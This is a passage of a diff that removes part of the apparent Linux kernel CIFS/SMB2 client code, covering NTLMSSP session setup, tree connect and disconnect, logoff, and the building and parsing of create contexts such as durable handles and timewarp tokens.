+-		cifs_dbg(VFS, "Invalid security buffer offset %d\n",
+-			le16_to_cpu(rsp->SecurityBufferOffset));
+-		rc = -EIO;
+-		goto out;
+-	}
+-	rc = decode_ntlmssp_challenge(rsp->Buffer,
+-			le16_to_cpu(rsp->SecurityBufferLength), ses);
+-	if (rc)
+-		goto out;
+-
+-	cifs_dbg(FYI, "rawntlmssp session setup challenge phase\n");
+-
+-	spin_lock(&ses->ses_lock);
+-	is_binding = (ses->ses_status == SES_GOOD);
+-	spin_unlock(&ses->ses_lock);
+-
+-	/* keep existing ses id and flags if binding */
+-	if (!is_binding) {
+-		ses->Suid = le64_to_cpu(rsp->hdr.SessionId);
+-		ses->session_flags = le16_to_cpu(rsp->SessionFlags);
+-	}
+-
+-out:
+-	kfree_sensitive(ntlmssp_blob);
+-	SMB2_sess_free_buffer(sess_data);
+-	if (!rc) {
+-		sess_data->result = 0;
+-		sess_data->func = SMB2_sess_auth_rawntlmssp_authenticate;
+-		return;
+-	}
+-out_err:
+-	kfree_sensitive(ses->ntlmssp);
+-	ses->ntlmssp = NULL;
+-	sess_data->result = rc;
+-	sess_data->func = NULL;
+-}
+-
+-static void
+-SMB2_sess_auth_rawntlmssp_authenticate(struct SMB2_sess_data *sess_data)
+-{
+-	int rc;
+-	struct cifs_ses *ses = sess_data->ses;
+-	struct TCP_Server_Info *server = sess_data->server;
+-	struct smb2_sess_setup_req *req;
+-	struct smb2_sess_setup_rsp *rsp = NULL;
+-	unsigned char *ntlmssp_blob = NULL;
+-	bool use_spnego = false; /* else use raw ntlmssp */
+-	u16 blob_length = 0;
+-	bool is_binding = false;
+-
+-	rc = SMB2_sess_alloc_buffer(sess_data);
+-	if (rc)
+-		goto out;
+-
+-	req = (struct smb2_sess_setup_req *) sess_data->iov[0].iov_base;
+-	req->hdr.SessionId = cpu_to_le64(ses->Suid);
+-
+-	rc = build_ntlmssp_auth_blob(&ntlmssp_blob, &blob_length,
+-				     ses, server,
+-				     sess_data->nls_cp);
+-	if (rc) {
+-		cifs_dbg(FYI, "build_ntlmssp_auth_blob failed %d\n", rc);
+-		goto out;
+-	}
+-
+-	if (use_spnego) {
+-		/* BB eventually need to add this */
+-		cifs_dbg(VFS, "spnego not supported for SMB2 yet\n");
+-		rc = -EOPNOTSUPP;
+-		goto out;
+-	}
+-	sess_data->iov[1].iov_base = ntlmssp_blob;
+-	sess_data->iov[1].iov_len = blob_length;
+-
+-	rc = SMB2_sess_sendreceive(sess_data);
+-	if (rc)
+-		goto out;
+-
+-	rsp = (struct smb2_sess_setup_rsp *)sess_data->iov[0].iov_base;
+-
+-	spin_lock(&ses->ses_lock);
+-	is_binding = (ses->ses_status == SES_GOOD);
+-	spin_unlock(&ses->ses_lock);
+-
+-	/* keep existing ses id and flags if binding */
+-	if (!is_binding) {
+-		ses->Suid = le64_to_cpu(rsp->hdr.SessionId);
+-		ses->session_flags = le16_to_cpu(rsp->SessionFlags);
+-	}
+-
+-	rc = SMB2_sess_establish_session(sess_data);
+-#ifdef CONFIG_CIFS_DEBUG_DUMP_KEYS
+-	if (ses->server->dialect < SMB30_PROT_ID) {
+-		cifs_dbg(VFS, "%s: dumping generated SMB2 session keys\n", __func__);
+-		/*
+-		 * The session id is opaque in terms of endianness, so we can't
+-		 * print it as a long long. we dump it as we got it on the wire
+-		 */
+-		cifs_dbg(VFS, "Session Id    %*ph\n", (int)sizeof(ses->Suid),
+-			 &ses->Suid);
+-		cifs_dbg(VFS, "Session Key   %*ph\n",
+-			 SMB2_NTLMV2_SESSKEY_SIZE, ses->auth_key.response);
+-		cifs_dbg(VFS, "Signing Key   %*ph\n",
+-			 SMB3_SIGN_KEY_SIZE, ses->auth_key.response);
+-	}
+-#endif
+-out:
+-	kfree_sensitive(ntlmssp_blob);
+-	SMB2_sess_free_buffer(sess_data);
+-	kfree_sensitive(ses->ntlmssp);
+-	ses->ntlmssp = NULL;
+-	sess_data->result = rc;
+-	sess_data->func = NULL;
+-}
+-
+-static int
+-SMB2_select_sec(struct SMB2_sess_data *sess_data)
+-{
+-	int type;
+-	struct cifs_ses *ses = sess_data->ses;
+-	struct TCP_Server_Info *server = sess_data->server;
+-
+-	type = smb2_select_sectype(server, ses->sectype);
+-	cifs_dbg(FYI, "sess setup type %d\n", type);
+-	if (type == Unspecified) {
+-		cifs_dbg(VFS, "Unable to select appropriate authentication method!\n");
+-		return -EINVAL;
+-	}
+-
+-	switch (type) {
+-	case Kerberos:
+-		sess_data->func = SMB2_auth_kerberos;
+-		break;
+-	case RawNTLMSSP:
+-		sess_data->func = SMB2_sess_auth_rawntlmssp_negotiate;
+-		break;
+-	default:
+-		cifs_dbg(VFS, "secType %d not supported!\n", type);
+-		return -EOPNOTSUPP;
+-	}
+-
+-	return 0;
+-}
+-
+-int
+-SMB2_sess_setup(const unsigned int xid, struct cifs_ses *ses,
+-		struct TCP_Server_Info *server,
+-		const struct nls_table *nls_cp)
+-{
+-	int rc = 0;
+-	struct SMB2_sess_data *sess_data;
+-
+-	cifs_dbg(FYI, "Session Setup\n");
+-
+-	if (!server) {
+-		WARN(1, "%s: server is NULL!\n", __func__);
+-		return -EIO;
+-	}
+-
+-	sess_data = kzalloc(sizeof(struct SMB2_sess_data), GFP_KERNEL);
+-	if (!sess_data)
+-		return -ENOMEM;
+-
+-	sess_data->xid = xid;
+-	sess_data->ses = ses;
+-	sess_data->server = server;
+-	sess_data->buf0_type = CIFS_NO_BUFFER;
+-	sess_data->nls_cp = (struct nls_table *) nls_cp;
+-	sess_data->previous_session = ses->Suid;
+-
+-	rc = SMB2_select_sec(sess_data);
+-	if (rc)
+-		goto out;
+-
+-	/*
+-	 * Initialize the session hash with the server one.
+-	 */
+-	memcpy(ses->preauth_sha_hash, server->preauth_sha_hash,
+-	       SMB2_PREAUTH_HASH_SIZE);
+-
+-	while (sess_data->func)
+-		sess_data->func(sess_data);
+-
+-	if ((ses->session_flags & SMB2_SESSION_FLAG_IS_GUEST) && (ses->sign))
+-		cifs_server_dbg(VFS, "signing requested but authenticated as guest\n");
+-	rc = sess_data->result;
+-out:
+-	kfree_sensitive(sess_data);
+-	return rc;
+-}
+-
+-int
+-SMB2_logoff(const unsigned int xid, struct cifs_ses *ses)
+-{
+-	struct smb_rqst rqst;
+-	struct smb2_logoff_req *req; /* response is also trivial struct */
+-	int rc = 0;
+-	struct TCP_Server_Info *server;
+-	int flags = 0;
+-	unsigned int total_len;
+-	struct kvec iov[1];
+-	struct kvec rsp_iov;
+-	int resp_buf_type;
+-
+-	cifs_dbg(FYI, "disconnect session %p\n", ses);
+-
+-	if (ses && (ses->server))
+-		server = ses->server;
+-	else
+-		return -EIO;
+-
+-	/* no need to send SMB logoff if uid already closed due to reconnect */
+-	spin_lock(&ses->chan_lock);
+-	if (CIFS_ALL_CHANS_NEED_RECONNECT(ses)) {
+-		spin_unlock(&ses->chan_lock);
+-		goto smb2_session_already_dead;
+-	}
+-	spin_unlock(&ses->chan_lock);
+-
+-	rc = smb2_plain_req_init(SMB2_LOGOFF, NULL, ses->server,
+-				 (void **) &req, &total_len);
+-	if (rc)
+-		return rc;
+-
+-	 /* since no tcon, smb2_init can not do this, so do here */
+-	req->hdr.SessionId = cpu_to_le64(ses->Suid);
+-
+-	if (ses->session_flags & SMB2_SESSION_FLAG_ENCRYPT_DATA)
+-		flags |= CIFS_TRANSFORM_REQ;
+-	else if (server->sign)
+-		req->hdr.Flags |= SMB2_FLAGS_SIGNED;
+-
+-	flags |= CIFS_NO_RSP_BUF;
+-
+-	iov[0].iov_base = (char *)req;
+-	iov[0].iov_len = total_len;
+-
+-	memset(&rqst, 0, sizeof(struct smb_rqst));
+-	rqst.rq_iov = iov;
+-	rqst.rq_nvec = 1;
+-
+-	rc = cifs_send_recv(xid, ses, ses->server,
+-			    &rqst, &resp_buf_type, flags, &rsp_iov);
+-	cifs_small_buf_release(req);
+-	/*
+-	 * No tcon so can't do
+-	 * cifs_stats_inc(&tcon->stats.smb2_stats.smb2_com_fail[SMB2...]);
+-	 */
+-
+-smb2_session_already_dead:
+-	return rc;
+-}
+-
+-static inline void cifs_stats_fail_inc(struct cifs_tcon *tcon, uint16_t code)
+-{
+-	cifs_stats_inc(&tcon->stats.smb2_stats.smb2_com_failed[code]);
+-}
+-
+-#define MAX_SHARENAME_LENGTH (255 /* server */ + 80 /* share */ + 1 /* NULL */)
+-
+-/* These are similar values to what Windows uses */
+-static inline void init_copy_chunk_defaults(struct cifs_tcon *tcon)
+-{
+-	tcon->max_chunks = 256;
+-	tcon->max_bytes_chunk = 1048576;
+-	tcon->max_bytes_copy = 16777216;
+-}
+-
+-int
+-SMB2_tcon(const unsigned int xid, struct cifs_ses *ses, const char *tree,
+-	  struct cifs_tcon *tcon, const struct nls_table *cp)
+-{
+-	struct smb_rqst rqst;
+-	struct smb2_tree_connect_req *req;
+-	struct smb2_tree_connect_rsp *rsp = NULL;
+-	struct kvec iov[2];
+-	struct kvec rsp_iov = { NULL, 0 };
+-	int rc = 0;
+-	int resp_buftype;
+-	int unc_path_len;
+-	__le16 *unc_path = NULL;
+-	int flags = 0;
+-	unsigned int total_len;
+-	struct TCP_Server_Info *server;
+-
+-	/* always use master channel */
+-	server = ses->server;
+-
+-	cifs_dbg(FYI, "TCON\n");
+-
+-	if (!server || !tree)
+-		return -EIO;
+-
+-	unc_path = kmalloc(MAX_SHARENAME_LENGTH * 2, GFP_KERNEL);
+-	if (unc_path == NULL)
+-		return -ENOMEM;
+-
+-	unc_path_len = cifs_strtoUTF16(unc_path, tree, strlen(tree), cp) + 1;
+-	unc_path_len *= 2;
+-	if (unc_path_len < 2) {
+-		kfree(unc_path);
+-		return -EINVAL;
+-	}
+-
+-	/* SMB2 TREE_CONNECT request must be called with TreeId == 0 */
+-	tcon->tid = 0;
+-	atomic_set(&tcon->num_remote_opens, 0);
+-	rc = smb2_plain_req_init(SMB2_TREE_CONNECT, tcon, server,
+-				 (void **) &req, &total_len);
+-	if (rc) {
+-		kfree(unc_path);
+-		return rc;
+-	}
+-
+-	if (smb3_encryption_required(tcon))
+-		flags |= CIFS_TRANSFORM_REQ;
+-
+-	iov[0].iov_base = (char *)req;
+-	/* 1 for pad */
+-	iov[0].iov_len = total_len - 1;
+-
+-	/* Testing shows that buffer offset must be at location of Buffer[0] */
+-	req->PathOffset = cpu_to_le16(sizeof(struct smb2_tree_connect_req)
+-			- 1 /* pad */);
+-	req->PathLength = cpu_to_le16(unc_path_len - 2);
+-	iov[1].iov_base = unc_path;
+-	iov[1].iov_len = unc_path_len;
+-
+-	/*
+-	 * 3.11 tcon req must be signed if not encrypted. See MS-SMB2 3.2.4.1.1
+-	 * unless it is guest or anonymous user. See MS-SMB2 3.2.5.3.1
+-	 * (Samba servers don't always set the flag so also check if null user)
+-	 */
+-	if ((server->dialect == SMB311_PROT_ID) &&
+-	    !smb3_encryption_required(tcon) &&
+-	    !(ses->session_flags &
+-		    (SMB2_SESSION_FLAG_IS_GUEST|SMB2_SESSION_FLAG_IS_NULL)) &&
+-	    ((ses->user_name != NULL) || (ses->sectype == Kerberos)))
+-		req->hdr.Flags |= SMB2_FLAGS_SIGNED;
+-
+-	memset(&rqst, 0, sizeof(struct smb_rqst));
+-	rqst.rq_iov = iov;
+-	rqst.rq_nvec = 2;
+-
+-	/* Need 64 for max size write so ask for more in case not there yet */
+-	req->hdr.CreditRequest = cpu_to_le16(64);
+-
+-	rc = cifs_send_recv(xid, ses, server,
+-			    &rqst, &resp_buftype, flags, &rsp_iov);
+-	cifs_small_buf_release(req);
+-	rsp = (struct smb2_tree_connect_rsp *)rsp_iov.iov_base;
+-	trace_smb3_tcon(xid, tcon->tid, ses->Suid, tree, rc);
+-	if ((rc != 0) || (rsp == NULL)) {
+-		cifs_stats_fail_inc(tcon, SMB2_TREE_CONNECT_HE);
+-		tcon->need_reconnect = true;
+-		goto tcon_error_exit;
+-	}
+-
+-	switch (rsp->ShareType) {
+-	case SMB2_SHARE_TYPE_DISK:
+-		cifs_dbg(FYI, "connection to disk share\n");
+-		break;
+-	case SMB2_SHARE_TYPE_PIPE:
+-		tcon->pipe = true;
+-		cifs_dbg(FYI, "connection to pipe share\n");
+-		break;
+-	case SMB2_SHARE_TYPE_PRINT:
+-		tcon->print = true;
+-		cifs_dbg(FYI, "connection to printer\n");
+-		break;
+-	default:
+-		cifs_server_dbg(VFS, "unknown share type %d\n", rsp->ShareType);
+-		rc = -EOPNOTSUPP;
+-		goto tcon_error_exit;
+-	}
+-
+-	tcon->share_flags = le32_to_cpu(rsp->ShareFlags);
+-	tcon->capabilities = rsp->Capabilities; /* we keep caps little endian */
+-	tcon->maximal_access = le32_to_cpu(rsp->MaximalAccess);
+-	tcon->tid = le32_to_cpu(rsp->hdr.Id.SyncId.TreeId);
+-	strscpy(tcon->tree_name, tree, sizeof(tcon->tree_name));
+-
+-	if ((rsp->Capabilities & SMB2_SHARE_CAP_DFS) &&
+-	    ((tcon->share_flags & SHI1005_FLAGS_DFS) == 0))
+-		cifs_tcon_dbg(VFS, "DFS capability contradicts DFS flag\n");
+-
+-	if (tcon->seal &&
+-	    !(server->capabilities & SMB2_GLOBAL_CAP_ENCRYPTION))
+-		cifs_tcon_dbg(VFS, "Encryption is requested but not supported\n");
+-
+-	init_copy_chunk_defaults(tcon);
+-	if (server->ops->validate_negotiate)
+-		rc = server->ops->validate_negotiate(xid, tcon);
+-tcon_exit:
+-
+-	free_rsp_buf(resp_buftype, rsp);
+-	kfree(unc_path);
+-	return rc;
+-
+-tcon_error_exit:
+-	if (rsp && rsp->hdr.Status == STATUS_BAD_NETWORK_NAME)
+-		cifs_tcon_dbg(VFS, "BAD_NETWORK_NAME: %s\n", tree);
+-	goto tcon_exit;
+-}
+-
+-int
+-SMB2_tdis(const unsigned int xid, struct cifs_tcon *tcon)
+-{
+-	struct smb_rqst rqst;
+-	struct smb2_tree_disconnect_req *req; /* response is trivial */
+-	int rc = 0;
+-	struct cifs_ses *ses = tcon->ses;
+-	int flags = 0;
+-	unsigned int total_len;
+-	struct kvec iov[1];
+-	struct kvec rsp_iov;
+-	int resp_buf_type;
+-
+-	cifs_dbg(FYI, "Tree Disconnect\n");
+-
+-	if (!ses || !(ses->server))
+-		return -EIO;
+-
+-	trace_smb3_tdis_enter(xid, tcon->tid, ses->Suid, tcon->tree_name);
+-	spin_lock(&ses->chan_lock);
+-	if ((tcon->need_reconnect) ||
+-	    (CIFS_ALL_CHANS_NEED_RECONNECT(tcon->ses))) {
+-		spin_unlock(&ses->chan_lock);
+-		return 0;
+-	}
+-	spin_unlock(&ses->chan_lock);
+-
+-	invalidate_all_cached_dirs(tcon);
+-
+-	rc = smb2_plain_req_init(SMB2_TREE_DISCONNECT, tcon, ses->server,
+-				 (void **) &req,
+-				 &total_len);
+-	if (rc)
+-		return rc;
+-
+-	if (smb3_encryption_required(tcon))
+-		flags |= CIFS_TRANSFORM_REQ;
+-
+-	flags |= CIFS_NO_RSP_BUF;
+-
+-	iov[0].iov_base = (char *)req;
+-	iov[0].iov_len = total_len;
+-
+-	memset(&rqst, 0, sizeof(struct smb_rqst));
+-	rqst.rq_iov = iov;
+-	rqst.rq_nvec = 1;
+-
+-	rc = cifs_send_recv(xid, ses, ses->server,
+-			    &rqst, &resp_buf_type, flags, &rsp_iov);
+-	cifs_small_buf_release(req);
+-	if (rc) {
+-		cifs_stats_fail_inc(tcon, SMB2_TREE_DISCONNECT_HE);
+-		trace_smb3_tdis_err(xid, tcon->tid, ses->Suid, rc);
+-	}
+-	trace_smb3_tdis_done(xid, tcon->tid, ses->Suid);
+-
+-	return rc;
+-}
+-
+-
+-static struct create_durable *
+-create_durable_buf(void)
+-{
+-	struct create_durable *buf;
+-
+-	buf = kzalloc(sizeof(struct create_durable), GFP_KERNEL);
+-	if (!buf)
+-		return NULL;
+-
+-	buf->ccontext.DataOffset = cpu_to_le16(offsetof
+-					(struct create_durable, Data));
+-	buf->ccontext.DataLength = cpu_to_le32(16);
+-	buf->ccontext.NameOffset = cpu_to_le16(offsetof
+-				(struct create_durable, Name));
+-	buf->ccontext.NameLength = cpu_to_le16(4);
+-	/* SMB2_CREATE_DURABLE_HANDLE_REQUEST is "DHnQ" */
+-	buf->Name[0] = 'D';
+-	buf->Name[1] = 'H';
+-	buf->Name[2] = 'n';
+-	buf->Name[3] = 'Q';
+-	return buf;
+-}
+-
+-static struct create_durable *
+-create_reconnect_durable_buf(struct cifs_fid *fid)
+-{
+-	struct create_durable *buf;
+-
+-	buf = kzalloc(sizeof(struct create_durable), GFP_KERNEL);
+-	if (!buf)
+-		return NULL;
+-
+-	buf->ccontext.DataOffset = cpu_to_le16(offsetof
+-					(struct create_durable, Data));
+-	buf->ccontext.DataLength = cpu_to_le32(16);
+-	buf->ccontext.NameOffset = cpu_to_le16(offsetof
+-				(struct create_durable, Name));
+-	buf->ccontext.NameLength = cpu_to_le16(4);
+-	buf->Data.Fid.PersistentFileId = fid->persistent_fid;
+-	buf->Data.Fid.VolatileFileId = fid->volatile_fid;
+-	/* SMB2_CREATE_DURABLE_HANDLE_RECONNECT is "DHnC" */
+-	buf->Name[0] = 'D';
+-	buf->Name[1] = 'H';
+-	buf->Name[2] = 'n';
+-	buf->Name[3] = 'C';
+-	return buf;
+-}
+-
+-static void
+-parse_query_id_ctxt(struct create_context *cc, struct smb2_file_all_info *buf)
+-{
+-	struct create_on_disk_id *pdisk_id = (struct create_on_disk_id *)cc;
+-
+-	cifs_dbg(FYI, "parse query id context 0x%llx 0x%llx\n",
+-		pdisk_id->DiskFileId, pdisk_id->VolumeId);
+-	buf->IndexNumber = pdisk_id->DiskFileId;
+-}
+-
+-static void
+-parse_posix_ctxt(struct create_context *cc, struct smb2_file_all_info *info,
+-		 struct create_posix_rsp *posix)
+-{
+-	int sid_len;
+-	u8 *beg = (u8 *)cc + le16_to_cpu(cc->DataOffset);
+-	u8 *end = beg + le32_to_cpu(cc->DataLength);
+-	u8 *sid;
+-
+-	memset(posix, 0, sizeof(*posix));
+-
+-	posix->nlink = le32_to_cpu(*(__le32 *)(beg + 0));
+-	posix->reparse_tag = le32_to_cpu(*(__le32 *)(beg + 4));
+-	posix->mode = le32_to_cpu(*(__le32 *)(beg + 8));
+-
+-	sid = beg + 12;
+-	sid_len = posix_info_sid_size(sid, end);
+-	if (sid_len < 0) {
+-		cifs_dbg(VFS, "bad owner sid in posix create response\n");
+-		return;
+-	}
+-	memcpy(&posix->owner, sid, sid_len);
+-
+-	sid = sid + sid_len;
+-	sid_len = posix_info_sid_size(sid, end);
+-	if (sid_len < 0) {
+-		cifs_dbg(VFS, "bad group sid in posix create response\n");
+-		return;
+-	}
+-	memcpy(&posix->group, sid, sid_len);
+-
+-	cifs_dbg(FYI, "nlink=%d mode=%o reparse_tag=%x\n",
+-		 posix->nlink, posix->mode, posix->reparse_tag);
+-}
+-
+-void
+-smb2_parse_contexts(struct TCP_Server_Info *server,
+-		    struct smb2_create_rsp *rsp,
+-		    unsigned int *epoch, char *lease_key, __u8 *oplock,
+-		    struct smb2_file_all_info *buf,
+-		    struct create_posix_rsp *posix)
+-{
+-	char *data_offset;
+-	struct create_context *cc;
+-	unsigned int next;
+-	unsigned int remaining;
+-	char *name;
+-	static const char smb3_create_tag_posix[] = {
+-		0x93, 0xAD, 0x25, 0x50, 0x9C,
+-		0xB4, 0x11, 0xE7, 0xB4, 0x23, 0x83,
+-		0xDE, 0x96, 0x8B, 0xCD, 0x7C
+-	};
+-
+-	*oplock = 0;
+-	data_offset = (char *)rsp + le32_to_cpu(rsp->CreateContextsOffset);
+-	remaining = le32_to_cpu(rsp->CreateContextsLength);
+-	cc = (struct create_context *)data_offset;
+-
+-	/* Initialize inode number to 0 in case no valid data in qfid context */
+-	if (buf)
+-		buf->IndexNumber = 0;
+-
+-	while (remaining >= sizeof(struct create_context)) {
+-		name = le16_to_cpu(cc->NameOffset) + (char *)cc;
+-		if (le16_to_cpu(cc->NameLength) == 4 &&
+-		    strncmp(name, SMB2_CREATE_REQUEST_LEASE, 4) == 0)
+-			*oplock = server->ops->parse_lease_buf(cc, epoch,
+-							   lease_key);
+-		else if (buf && (le16_to_cpu(cc->NameLength) == 4) &&
+-		    strncmp(name, SMB2_CREATE_QUERY_ON_DISK_ID, 4) == 0)
+-			parse_query_id_ctxt(cc, buf);
+-		else if ((le16_to_cpu(cc->NameLength) == 16)) {
+-			if (posix &&
+-			    memcmp(name, smb3_create_tag_posix, 16) == 0)
+-				parse_posix_ctxt(cc, buf, posix);
+-		}
+-		/* else {
+-			cifs_dbg(FYI, "Context not matched with len %d\n",
+-				le16_to_cpu(cc->NameLength));
+-			cifs_dump_mem("Cctxt name: ", name, 4);
+-		} */
+-
+-		next = le32_to_cpu(cc->Next);
+-		if (!next)
+-			break;
+-		remaining -= next;
+-		cc = (struct create_context *)((char *)cc + next);
+-	}
+-
+-	if (rsp->OplockLevel != SMB2_OPLOCK_LEVEL_LEASE)
+-		*oplock = rsp->OplockLevel;
+-
+-	return;
+-}
+-
+-static int
+-add_lease_context(struct TCP_Server_Info *server, struct kvec *iov,
+-		  unsigned int *num_iovec, u8 *lease_key, __u8 *oplock)
+-{
+-	struct smb2_create_req *req = iov[0].iov_base;
+-	unsigned int num = *num_iovec;
+-
+-	iov[num].iov_base = server->ops->create_lease_buf(lease_key, *oplock);
+-	if (iov[num].iov_base == NULL)
+-		return -ENOMEM;
+-	iov[num].iov_len = server->vals->create_lease_size;
+-	req->RequestedOplockLevel = SMB2_OPLOCK_LEVEL_LEASE;
+-	if (!req->CreateContextsOffset)
+-		req->CreateContextsOffset = cpu_to_le32(
+-				sizeof(struct smb2_create_req) +
+-				iov[num - 1].iov_len);
+-	le32_add_cpu(&req->CreateContextsLength,
+-		     server->vals->create_lease_size);
+-	*num_iovec = num + 1;
+-	return 0;
+-}
+-
+-static struct create_durable_v2 *
+-create_durable_v2_buf(struct cifs_open_parms *oparms)
+-{
+-	struct cifs_fid *pfid = oparms->fid;
+-	struct create_durable_v2 *buf;
+-
+-	buf = kzalloc(sizeof(struct create_durable_v2), GFP_KERNEL);
+-	if (!buf)
+-		return NULL;
+-
+-	buf->ccontext.DataOffset = cpu_to_le16(offsetof
+-					(struct create_durable_v2, dcontext));
+-	buf->ccontext.DataLength = cpu_to_le32(sizeof(struct durable_context_v2));
+-	buf->ccontext.NameOffset = cpu_to_le16(offsetof
+-				(struct create_durable_v2, Name));
+-	buf->ccontext.NameLength = cpu_to_le16(4);
+-
+-	/*
+-	 * NB: Handle timeout defaults to 0, which allows server to choose
+-	 * (most servers default to 120 seconds) and most clients default to 0.
+-	 * This can be overridden at mount ("handletimeout=") if the user wants
+-	 * a different persistent (or resilient) handle timeout for all opens
+-	 * opens on a particular SMB3 mount.
+-	 */
+-	buf->dcontext.Timeout = cpu_to_le32(oparms->tcon->handle_timeout);
+-	buf->dcontext.Flags = cpu_to_le32(SMB2_DHANDLE_FLAG_PERSISTENT);
+-	generate_random_uuid(buf->dcontext.CreateGuid);
+-	memcpy(pfid->create_guid, buf->dcontext.CreateGuid, 16);
+-
+-	/* SMB2_CREATE_DURABLE_HANDLE_REQUEST is "DH2Q" */
+-	buf->Name[0] = 'D';
+-	buf->Name[1] = 'H';
+-	buf->Name[2] = '2';
+-	buf->Name[3] = 'Q';
+-	return buf;
+-}
+-
+-static struct create_durable_handle_reconnect_v2 *
+-create_reconnect_durable_v2_buf(struct cifs_fid *fid)
+-{
+-	struct create_durable_handle_reconnect_v2 *buf;
+-
+-	buf = kzalloc(sizeof(struct create_durable_handle_reconnect_v2),
+-			GFP_KERNEL);
+-	if (!buf)
+-		return NULL;
+-
+-	buf->ccontext.DataOffset =
+-		cpu_to_le16(offsetof(struct create_durable_handle_reconnect_v2,
+-				     dcontext));
+-	buf->ccontext.DataLength =
+-		cpu_to_le32(sizeof(struct durable_reconnect_context_v2));
+-	buf->ccontext.NameOffset =
+-		cpu_to_le16(offsetof(struct create_durable_handle_reconnect_v2,
+-			    Name));
+-	buf->ccontext.NameLength = cpu_to_le16(4);
+-
+-	buf->dcontext.Fid.PersistentFileId = fid->persistent_fid;
+-	buf->dcontext.Fid.VolatileFileId = fid->volatile_fid;
+-	buf->dcontext.Flags = cpu_to_le32(SMB2_DHANDLE_FLAG_PERSISTENT);
+-	memcpy(buf->dcontext.CreateGuid, fid->create_guid, 16);
+-
+-	/* SMB2_CREATE_DURABLE_HANDLE_RECONNECT_V2 is "DH2C" */
+-	buf->Name[0] = 'D';
+-	buf->Name[1] = 'H';
+-	buf->Name[2] = '2';
+-	buf->Name[3] = 'C';
+-	return buf;
+-}
+-
+-static int
+-add_durable_v2_context(struct kvec *iov, unsigned int *num_iovec,
+-		    struct cifs_open_parms *oparms)
+-{
+-	struct smb2_create_req *req = iov[0].iov_base;
+-	unsigned int num = *num_iovec;
+-
+-	iov[num].iov_base = create_durable_v2_buf(oparms);
+-	if (iov[num].iov_base == NULL)
+-		return -ENOMEM;
+-	iov[num].iov_len = sizeof(struct create_durable_v2);
+-	if (!req->CreateContextsOffset)
+-		req->CreateContextsOffset =
+-			cpu_to_le32(sizeof(struct smb2_create_req) +
+-								iov[1].iov_len);
+-	le32_add_cpu(&req->CreateContextsLength, sizeof(struct create_durable_v2));
+-	*num_iovec = num + 1;
+-	return 0;
+-}
+-
+-static int
+-add_durable_reconnect_v2_context(struct kvec *iov, unsigned int *num_iovec,
+-		    struct cifs_open_parms *oparms)
+-{
+-	struct smb2_create_req *req = iov[0].iov_base;
+-	unsigned int num = *num_iovec;
+-
+-	/* indicate that we don't need to relock the file */
+-	oparms->reconnect = false;
+-
+-	iov[num].iov_base = create_reconnect_durable_v2_buf(oparms->fid);
+-	if (iov[num].iov_base == NULL)
+-		return -ENOMEM;
+-	iov[num].iov_len = sizeof(struct create_durable_handle_reconnect_v2);
+-	if (!req->CreateContextsOffset)
+-		req->CreateContextsOffset =
+-			cpu_to_le32(sizeof(struct smb2_create_req) +
+-								iov[1].iov_len);
+-	le32_add_cpu(&req->CreateContextsLength,
+-			sizeof(struct create_durable_handle_reconnect_v2));
+-	*num_iovec = num + 1;
+-	return 0;
+-}
+-
+-static int
+-add_durable_context(struct kvec *iov, unsigned int *num_iovec,
+-		    struct cifs_open_parms *oparms, bool use_persistent)
+-{
+-	struct smb2_create_req *req = iov[0].iov_base;
+-	unsigned int num = *num_iovec;
+-
+-	if (use_persistent) {
+-		if (oparms->reconnect)
+-			return add_durable_reconnect_v2_context(iov, num_iovec,
+-								oparms);
+-		else
+-			return add_durable_v2_context(iov, num_iovec, oparms);
+-	}
+-
+-	if (oparms->reconnect) {
+-		iov[num].iov_base = create_reconnect_durable_buf(oparms->fid);
+-		/* indicate that we don't need to relock the file */
+-		oparms->reconnect = false;
+-	} else
+-		iov[num].iov_base = create_durable_buf();
+-	if (iov[num].iov_base == NULL)
+-		return -ENOMEM;
+-	iov[num].iov_len = sizeof(struct create_durable);
+-	if (!req->CreateContextsOffset)
+-		req->CreateContextsOffset =
+-			cpu_to_le32(sizeof(struct smb2_create_req) +
+-								iov[1].iov_len);
+-	le32_add_cpu(&req->CreateContextsLength, sizeof(struct create_durable));
+-	*num_iovec = num + 1;
+-	return 0;
+-}
+-
+-/* See MS-SMB2 2.2.13.2.7 */
+-static struct crt_twarp_ctxt *
+-create_twarp_buf(__u64 timewarp)
+-{
+-	struct crt_twarp_ctxt *buf;
+-
+-	buf = kzalloc(sizeof(struct crt_twarp_ctxt), GFP_KERNEL);
+-	if (!buf)
+-		return NULL;
+-
+-	buf->ccontext.DataOffset = cpu_to_le16(offsetof
+-					(struct crt_twarp_ctxt, Timestamp));
+-	buf->ccontext.DataLength = cpu_to_le32(8);
+-	buf->ccontext.NameOffset = cpu_to_le16(offsetof
+-				(struct crt_twarp_ctxt, Name));
+-	buf->ccontext.NameLength = cpu_to_le16(4);
+-	/* SMB2_CREATE_TIMEWARP_TOKEN is "TWrp" */
+-	buf->Name[0] = 'T';
+-	buf->Name[1] = 'W';
+-	buf->Name[2] = 'r';
+-	buf->Name[3] = 'p';
+-	buf->Timestamp = cpu_to_le64(timewarp);
+-	return buf;
+-}
+-
+-/* See MS-SMB2 2.2.13.2.7 */
+-static int
+-add_twarp_context(struct kvec *iov, unsigned int *num_iovec, __u64 timewarp)
+-{
+-	struct smb2_create_req *req = iov[0].iov_base;
+-	unsigned int num = *num_iovec;
+-
+-	iov[num].iov_base = create_twarp_buf(timewarp);
+-	if (iov[num].iov_base == NULL)
+-		return -ENOMEM;
+-	iov[num].iov_len = sizeof(struct crt_twarp_ctxt);
+-	if (!req->CreateContextsOffset)
+-		req->CreateContextsOffset = cpu_to_le32(
+-				sizeof(struct smb2_create_req) +
+-				iov[num - 1].iov_len);
+-	le32_add_cpu(&req->CreateContextsLength, sizeof(struct crt_twarp_ctxt));
+-	*num_iovec = num + 1;
+-	return 0;
+-}
+-
+-/* See See http://technet.microsoft.com/en-us/library/hh509017(v=ws.10).aspx */
+-static void setup_owner_group_sids(char *buf)
+-{
+-	struct owner_group_sids *sids = (struct owner_group_sids *)buf;
+-
+-	/* Populate the user ownership fields S-1-5-88-1 */
+-	sids->owner.Revision = 1;
+-	sids->owner.NumAuth = 3;
+-	sids->owner.Authority[5] = 5;
+-	sids->owner.SubAuthorities[0] = cpu_to_le32(88);
+-	sids->owner.SubAuthorities[1] = cpu_to_le32(1);
+-	sids->owner.SubAuthorities[2] = cpu_to_le32(current_fsuid().val);
+-
+-	/* Populate the group ownership fields S-1-5-88-2 */
+-	sids->group.Revision = 1;
+-	sids->group.NumAuth = 3;
+-	sids->group.Authority[5] = 5;
+-	sids->group.SubAuthorities[0] = cpu_to_le32(88);
